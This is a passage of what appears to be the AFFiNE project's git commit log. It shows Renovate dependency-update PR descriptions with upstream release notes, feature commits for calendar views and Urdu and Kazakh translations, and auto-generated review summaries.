<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-20 10:26:38 +08:00
renovate[bot] bac346f304 chore: bump up nestjs to v13.4.1 (#15002) 2026-05-20 05:51:24 +08:00
DarkSky 9f33d37add feat(core): integrate realtime features (#15003) 2026-05-20 05:48:03 +08:00
renovate[bot] 3e42bbf4fa chore: bump up apple/swift-collections version to from: "1.5.1" (#15001)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[apple/swift-collections](https://redirect.github.com/apple/swift-collections)
| patch | `from: "1.5.0"` → `from: "1.5.1"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

###
[`v1.5.1`](https://redirect.github.com/apple/swift-collections/releases/tag/1.5.1):
Swift Collections 1.5.1

[Compare
Source](https://redirect.github.com/apple/swift-collections/compare/1.5.0...1.5.1)

This is a patch release resolving three issues uncovered since 1.5.0 was
tagged, including a source breaking regression introduced in 1.4.0,
affecting clients importing the `Collections` module.

#### What's Changed

- Import error from `HashTreeCollections`, reported by
[@&#8203;vanvoorden](https://redirect.github.com/vanvoorden) in
[#&#8203;653](https://redirect.github.com/apple/swift-collections/issues/653)
- Resolve source break in the Collections module by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;654](https://redirect.github.com/apple/swift-collections/pull/654)
- Linker error around RigidArray when using in Embedded Swift for
WebAssembly, reported by
[@&#8203;sliemeobn](https://redirect.github.com/sliemeobn) in
[#&#8203;648](https://redirect.github.com/apple/swift-collections/issues/648)
- \[BasicContainers] Don’t define LLDB formatter symbol on Wasm by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;650](https://redirect.github.com/apple/swift-collections/pull/650)
- Guard `UniqueBox.borrow` correctly by
[@&#8203;FranzBusch](https://redirect.github.com/FranzBusch) in
[#&#8203;649](https://redirect.github.com/apple/swift-collections/pull/649)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.5.0...1.5.1>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-19 23:58:03 +08:00
renovate[bot] b5e5f0708a chore: bump up Lakr233/MarkdownView version to from: "3.9.1" (#14861)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView)
| minor | `from: "3.8.2"` → `from: "3.9.1"` |

---

### Release Notes

<details>
<summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary>

###
[`v3.9.1`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.9.0...3.9.1)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.9.0...3.9.1)

###
[`v3.9.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.2...3.9.0)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.2...3.9.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-19 22:52:20 +08:00
Abdul Rehman f96bf3dd24 feat(i18n): expand Urdu translation (#14995)
Closes #14994
🇵🇰 Urdu Translation for Pakistani Users
## Summary

`ur.json` previously had only 31 of 2404 keys translated (~1%), leaving
most of the AFFiNE UI in English for Urdu-speaking users. This PR fills
in the remaining ~2400 keys so Pakistani / Urdu users get a fully
localized experience.

- `packages/frontend/i18n/src/resources/ur.json` — expanded from 31 →
2404 keys
- `packages/frontend/i18n/src/i18n-completenesses.json` — `ur: 2` → `ur:
100`

Existing hand-translated keys were preserved.

## Screenshots

<img width="1600" height="716" alt="image"
src="https://github.com/user-attachments/assets/1e3395b9-7cb0-44ba-a29f-a484419eb9fd"
/>
--------

<img width="1600" height="716" alt="image"
src="https://github.com/user-attachments/assets/f03cb1ac-dde8-4425-a898-c56acebe45b6"
/>



## Test plan

- [x] Switch app language to Urdu (اردو) in Settings → Appearance →
Language
- [x] Sidebar, top bar, calendar, doc list, settings panels all render
in Urdu
- [x] RTL layout flows correctly
- [x] Prettier + lint clean

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Localization**
* Urdu language support is now fully available across the application,
including translated UI text and locale-specific content.
* Users can select Urdu as their preferred language and experience
consistent translations and messaging throughout the product.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14995?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-19 22:49:22 +08:00
DarkSky c53457691d feat(server): entitlement based model (#14996)
#### PR Dependency Tree


* **PR #14996** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Admin mutations to grant/revoke commercial entitlements.
  * New Doc comment-update permission.
  * Realtime user/workspace quota-state endpoints and live-update rooms.

* **Bug Fixes**
  * More accurate readable-doc filtering and permission evaluation.

* **Refactor**
* Workspace feature management moved to entitlement-based model;
permission and quota pipelines redesigned.
  * Admin workspace UI now edits flags only (feature toggles removed).

* **Tests**
* Extensive new and updated tests for permissions, entitlements, quota,
projection, and backfills.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14996?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-19 22:48:05 +08:00
Azamat Jauysh 103ad2a810 feat(i18n): add Kazakh translation (#14981)
Closes #14975

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Kazakh (kk) language has been added — users can now choose Kazakh for
the interface, with complete localization coverage and language metadata
(name and flag) included.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14981?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-18 16:45:36 +08:00
DarkSky ef4939009f feat(editor): handle calendar view overflow in edgeless mode (#14992)
#### PR Dependency Tree


* **PR #14992** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Calendar view now supports horizontal scrolling for better navigation.

* **Bug Fixes**
* Improved mouse wheel interaction handling to prevent unintended
scrolling.

* **Style**
* Calendar layout is now more responsive and adapts better to different
screen sizes.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14992?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-18 09:32:02 +08:00
DarkSky 0f5778ac89 feat(editor): calendar view for database block (#14984)
fix #13663


#### PR Dependency Tree


* **PR #14984** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Calendar view for database blocks (month layout, entry cards,
external-source support)
  * Workspace calendar integration and new slash-menu "Calendar View"

* **Improvements**
* Create/manage database rows from calendar UI; preserve durations when
moving/resizing ranges
* Drag-and-drop, drop-preview, and hit-testing support for calendar and
docs
  * Redesigned in-menu View settings with multi-page navigation
  * Context-menu input autofocus toggle and conditional back-navigation

* **Tests**
* New unit and E2E suites covering calendar layout, interactions,
sources, and slash-menu integration
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-17 20:40:36 +08:00
DarkSky e9ef3c50c8 fix(editor): transcript note will create useless docs (#14976)
fix #13520


#### PR Dependency Tree


* **PR #14976** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Tests**
* Added comprehensive test coverage for markdown insertion functionality
to verify that existing document metadata remains unchanged when
importing markdown content into workspace documents.

* **Chores**
* Optimized internal markdown-to-snapshot conversion process to use a
more direct and efficient conversion approach.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14976)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-15 20:18:22 +08:00
renovate[bot] 661d5d3831 chore: bump up eslint-plugin-oxlint version to v1.64.0 (#14972)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint)
| [`1.60.0` →
`1.64.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.60.0/1.64.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.64.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.60.0/1.64.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.64.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.64.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.63.0...v1.64.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.63.0...v1.64.0)

###
[`v1.63.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.63.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.62.0...v1.63.0)

#####    🐞 Bug Fixes

- Ignore
[@&#8203;typescript-eslint/consistent-type-imports](https://redirect.github.com/typescript-eslint/consistent-type-imports)
for vue, astro, and svelte files  -  by
[@&#8203;Sysix](https://redirect.github.com/Sysix) in
[#&#8203;710](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/issues/710)
[<samp>(e9eb2)</samp>](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/commit/e9eb236)

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.62.0...v1.63.0)

###
[`v1.62.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.62.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.61.0...v1.62.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.61.0...v1.62.0)

###
[`v1.61.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.61.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.60.0...v1.61.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.60.0...v1.61.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzkuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE3OS4zIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-15 03:15:18 +08:00
DarkSky 6f55548661 fix(editor): improve tests stability (#14971)
#### PR Dependency Tree


* **PR #14971** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Tests**
  * Improved shape selection reliability in edge case testing scenarios
* Enhanced rich text editor focusing logic with better synchronization
for inline editor state validation

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14971)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-15 03:14:52 +08:00
renovate[bot] c39fa1ff2d chore: bump up apple/swift-collections version to from: "1.5.0" (#14969)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[apple/swift-collections](https://redirect.github.com/apple/swift-collections)
| minor | `from: "1.4.1"` → `from: "1.5.0"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

###
[`v1.5.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.5.0):
Swift Collections 1.5.0

[Compare
Source](https://redirect.github.com/apple/swift-collections/compare/1.4.1...1.5.0)

This feature release supports Swift toolchain versions 6.0, 6.1, 6.2,
and 6.3. It includes the following new features and bug fixes:

##### Debugging enhancements

The package now defines LLDB data formatters for `RigidArray`. The
formatters are emitted into the executable binary, and they are
automatically loaded by LLDB. We expect to implement formatters for
(many) more types in subsequent releases.

##### New stable APIs

- `RigidArray` and `UniqueArray` now conform to `Equatable` when their
element type is `Equatable`. This conformance requires a Swift 6.4 or
later toolchain (it relies on [SE-0499][SE-0499] generalizations of
`Equatable`/`Hashable` to support noncopyable conforming types).
- `RigidArray` and `UniqueArray` gained an `isTriviallyIdentical(to:)`
operation, which reports whether two instances share their underlying
storage allocation. This does not require the element type to be
`Equatable`, and it works with noncopyable elements.
- [`BitSet`][BitSet] gained a `makeIterator(from:)` shortcut for
starting iteration at (or after) a specific member, avoiding a linear
scan from the start of the set.
- [`OrderedDictionary`][OrderedDictionary] gained a
`replaceElement(at:withKey:value:)` operation that replaces the
key-value pair at a given index. The new key is allowed to equal the
existing key at that index (in which case only the value is updated).

[BitSet]:
https://swiftpackageindex.com/apple/swift-collections/documentation/bitcollections/bitset

[OrderedDictionary]:
https://swiftpackageindex.com/apple/swift-collections/documentation/orderedcollections/ordereddictionary

[SE-0499]:
https://redirect.github.com/swiftlang/swift-evolution/blob/main/proposals/0499-equatable-hashable-comparable-noncopyable.md

##### Experimental hashed containers (`UnstableHashedContainers` trait)

The Robin-Hood-hashed `UniqueSet`, `RigidSet`, `UniqueDictionary`, and
`RigidDictionary` types in the `BasicContainers` module continue to
evolve behind the `UnstableHashedContainers` package trait. This release
brings a number of correctness fixes and performance improvements:

- Faster removals, with better `maxProbeLength` maintenance to avoid
probe-length bloat.
- Small tables are now scrambled to avoid degenerate patterns on common
key distributions.
- A fast-path shortcut for insertions into under-utilized tables.
- Fixes to the insertion algorithm and to
`RigidDictionary.updateValue(forKey:with:)` (the latter exhibited
undefined behavior on removals).
- `RigidSet.insert(maximumCount:from:)` no longer spuriously reports a
capacity overflow due to incorrect accounting.
- The `UnstableHashedContainers` trait can now be enabled independently
of `UnstableContainersPreview`.

These types remain source-unstable for now.

##### Experimental sorted collections (`UnstableSortedCollections`
trait)

The `SortedCollections` module's [`SortedSet`][SortedSet] has gained the
following additions:

- `SortedSet` now supports value-range subscripts for the full variety
of standard range expression types, `ClosedRange`, `PartialRangeFrom`,
`PartialRangeThrough`, and `PartialRangeUpTo`.
- `SortedSet.firstIndex(after:)` and `SortedSet.lastIndex(before:)`
return the index to the nearest member following or preceding a given
value.

This release also fixes several underlying B-tree bugs that were
surfaced by these additions.

These types remain source-unstable; they have known API deficiencies
that will need to be addressed before they ship.

[SortedSet]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/SortedCollections/SortedSet

##### Experimental container protocols (`UnstableContainersPreview`
trait)

The `ContainersPreview` module's protocol hierarchy and associated types
continue to be developed. Several constructs have been renamed to follow
Swift Evolution proposals in flight.

| Old name                  | New name                    |
| ------------------------- | --------------------------- |
| `struct Box<T>`           | `struct UniqueBox<Value>`   |
| `struct Borrow<Target>`   | `struct Ref<Target>`        |
| `struct Inout<Target>`    | `struct MutableRef<Target>` |
| `Producer.ProducerError`  | `Producer.Failure`          |
| `Producer.generateNext()` | `Producer.next()`           |
| `Producer.skip(upTo:)`    | `Producer.skip(by:)`        |

For `UniqueBox`, `Ref` and `MutableRef`, there are deprecated
typealiases for the old names, preserving source compatibility.

Other changes to the experimental container model:

- `Container.Index` no longer needs to conform to `Comparable`. This
allows linked lists to become containers.
- `RigidArray`, `UniqueArray`, `RigidDeque`, and `UniqueDeque` now
conform to the container protocols.
- Added `Producer.collect(into:)` for collecting a producer's output
into a `RangeReplaceableContainer`.
- Added `BorrowingIteratorProtocol.copy()` for turning a borrowing
iterator into a producer.
- Added `filter` and `map` overloads for `BorrowingIteratorProtocol`,
`Producer`, and `Drain`.
- `BorrowingSequence.first` was removed.
- `BorrowingSequence`, `BorrowingIteratorProtocol` and their
requirements have temporarily gained trailing underscores to avoid
naming conflicts with the (provisional) protocol definition in the
Standard Library. We expect these definitions to be removed when these
protocols officially become part of the stdlib.

The protocol-based APIs in `ContainersPreview` now require a Swift 6.4
or later toolchain. `UniqueBox` is source-stable, therefore it continues
to require Swift 6.2.

##### Notable bug fixes

- `HashTreeCollections`: Fixed an invariant violation that could be
triggered by some operations on `TreeSet`/`TreeDictionary`.
- `_RopeModule`: Fixed an infinite loop when hashing the UTF-8 view of a
multi-chunk big substring.
- `BitCollections`: Fixed a bogus precondition in
`BitArray.insert(repeating:count:at:)`; fixed `BitSet.isSubset(of:
Range<Int>)` to correctly examine elements above the range's upper word.
- `HeapModule`: Fixed `Heap.insert(contentsOf:)` to use a wrapping
multiply in its Floyd-heuristic computation; added a missing bounds
assertion in `Heap._UnsafeHandle.swapAt(_:with:)`.
- `OrderedCollections`: Fixed `OrderedSet` crash on negative capacity
values; minor fixes in `_HashTable.UnsafeHandle`.
- `DequeModule`: Fixed sizing issue in
`UniqueDeque.replace(removing:addingCount:initializingWith:)`; fixed a
missing argument validation in
`RigidDeque.nextMutableSpan(after:maximumCount:)`;
`RigidDeque.consume(_:consumingWith:)` now closes the resulting gap
before returning; added zero-count fast-paths; replace/prepend
operations taking a `Collection` now verify that the source's count
matches its contents.
- `BasicContainers`: Fixed an overallocation issue in
`UniqueArray.replace(removing:copying:)`; fixed a partial-initialization
correctness issue in
`RigidArray.replace(removing:consumingWith:addingCount:initializingWith:)`.

#### What's Changed

- Add tests that build the ContainersPreview module by
[@&#8203;natecook1000](https://redirect.github.com/natecook1000) in
[#&#8203;610](https://redirect.github.com/apple/swift-collections/pull/610)
- Add a workflow that performs a CMake build by
[@&#8203;natecook1000](https://redirect.github.com/natecook1000) in
[#&#8203;612](https://redirect.github.com/apple/swift-collections/pull/612)
- Align `BorrowingSequence` implementation with proposal by
[@&#8203;natecook1000](https://redirect.github.com/natecook1000) in
[#&#8203;609](https://redirect.github.com/apple/swift-collections/pull/609)
- Bump
swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml
from 0.0.8 to 0.0.9 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;615](https://redirect.github.com/apple/swift-collections/pull/615)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.8 to 0.0.9 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;614](https://redirect.github.com/apple/swift-collections/pull/614)
- Fix lifetime requirements rigidly enforced in the latest nightlies by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;617](https://redirect.github.com/apple/swift-collections/pull/617)
- Track array proposal by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;619](https://redirect.github.com/apple/swift-collections/pull/619)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.9 to 0.0.10 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;620](https://redirect.github.com/apple/swift-collections/pull/620)
- OrderedSet: Don't crash on negative capacity values by
[@&#8203;thisismanan](https://redirect.github.com/thisismanan) in
[#&#8203;622](https://redirect.github.com/apple/swift-collections/pull/622)
- \[ContainersPreview] Don’t require `Container.Index` to conform to
`Comparable` by [@&#8203;lorentey](https://redirect.github.com/lorentey)
in
[#&#8203;623](https://redirect.github.com/apple/swift-collections/pull/623)
- Adjust experimental workflows by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;626](https://redirect.github.com/apple/swift-collections/pull/626)
- [BitSet] Add `BitSet.makeIterator(from:)` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;627](https://redirect.github.com/apple/swift-collections/pull/627)
- \[BasicContainers] RigidSet.insert(maximumCount:from:): Fix spurious
capacity overflow caused by incorrect accounting by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;628](https://redirect.github.com/apple/swift-collections/pull/628)
- \[BasicContainers]
RigidArray.replace(removing:consumingWith:addingCount:initializingWith:):
Fix correctness issue with partial initialization by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;629](https://redirect.github.com/apple/swift-collections/pull/629)
- \[BasicContainers] UniqueArray.replace(removing:copying): Fix
overallocation issue by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;630](https://redirect.github.com/apple/swift-collections/pull/630)
- Fix \_trim(first:) returning wrong buffer region by
[@&#8203;FranzBusch](https://redirect.github.com/FranzBusch) in
[#&#8203;631](https://redirect.github.com/apple/swift-collections/pull/631)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.10 to 0.0.11 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;625](https://redirect.github.com/apple/swift-collections/pull/625)
- \[OrderedCollections] Add
OrderedDictionary.replaceElement(at:withKey:… by
[@&#8203;inju2403](https://redirect.github.com/inju2403) in
[#&#8203;616](https://redirect.github.com/apple/swift-collections/pull/616)
- \[ContainersPreview] Producer.ProducerError ⟹ Producer.Failure by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;634](https://redirect.github.com/apple/swift-collections/pull/634)
- fix: reserveCapacity DocC link in RigidArray by
[@&#8203;manojmahapatra](https://redirect.github.com/manojmahapatra) in
[#&#8203;633](https://redirect.github.com/apple/swift-collections/pull/633)
- \[BasicContainers, DequeModule]: Assorted fixes by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;632](https://redirect.github.com/apple/swift-collections/pull/632)
- \[Debugging] Add lldb data formatter for RigidArray by
[@&#8203;kastiglione](https://redirect.github.com/kastiglione) in
[#&#8203;607](https://redirect.github.com/apple/swift-collections/pull/607)
- \[HashTreeCollections] Fix invariant violation in
\_HashNode.\_regularNode by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;635](https://redirect.github.com/apple/swift-collections/pull/635)
- \[BitCollections] Fix small issues by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;637](https://redirect.github.com/apple/swift-collections/pull/637)
- \[HeapModule, SortedCollections] Assorted tool-assisted fixes and
adjustments by [@&#8203;lorentey](https://redirect.github.com/lorentey)
in
[#&#8203;639](https://redirect.github.com/apple/swift-collections/pull/639)
- \[BasicContainers] Enable APIs scheduled to ship in 1.5.0 by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;641](https://redirect.github.com/apple/swift-collections/pull/641)
- \[BasicContainers] Fix copypasta in `UniqueArray.edit`’s docs by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;642](https://redirect.github.com/apple/swift-collections/pull/642)
- Rename `Box` to `UniqueBox`; align API surface with SE-0517 by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;640](https://redirect.github.com/apple/swift-collections/pull/640)
- Bump
swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml
from 0.0.9 to 0.0.11 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;624](https://redirect.github.com/apple/swift-collections/pull/624)
- Use the defines from traits directly by
[@&#8203;FranzBusch](https://redirect.github.com/FranzBusch) in
[#&#8203;644](https://redirect.github.com/apple/swift-collections/pull/644)
- \[ContainersPreview] `struct Borrow` ⟹ `struct Ref` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;643](https://redirect.github.com/apple/swift-collections/pull/643)
- \[ContainersPreview] `struct Inout` ⟹ `struct MutableRef` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;646](https://redirect.github.com/apple/swift-collections/pull/646)
- 1.5.0 release preparations by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;647](https://redirect.github.com/apple/swift-collections/pull/647)

#### New Contributors

- [@&#8203;thisismanan](https://redirect.github.com/thisismanan) made
their first contribution in
[#&#8203;622](https://redirect.github.com/apple/swift-collections/pull/622)
- [@&#8203;FranzBusch](https://redirect.github.com/FranzBusch) made
their first contribution in
[#&#8203;631](https://redirect.github.com/apple/swift-collections/pull/631)
- [@&#8203;inju2403](https://redirect.github.com/inju2403) made their
first contribution in
[#&#8203;616](https://redirect.github.com/apple/swift-collections/pull/616)
- [@&#8203;manojmahapatra](https://redirect.github.com/manojmahapatra)
made their first contribution in
[#&#8203;633](https://redirect.github.com/apple/swift-collections/pull/633)
- [@&#8203;kastiglione](https://redirect.github.com/kastiglione) made
their first contribution in
[#&#8203;607](https://redirect.github.com/apple/swift-collections/pull/607)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.4.1...1.5.0>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzkuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE3OS4zIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-15 01:02:39 +08:00
DarkSky 3416de1e4d fix(server): missing root cert (#14970)
#### PR Dependency Tree


* **PR #14970** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
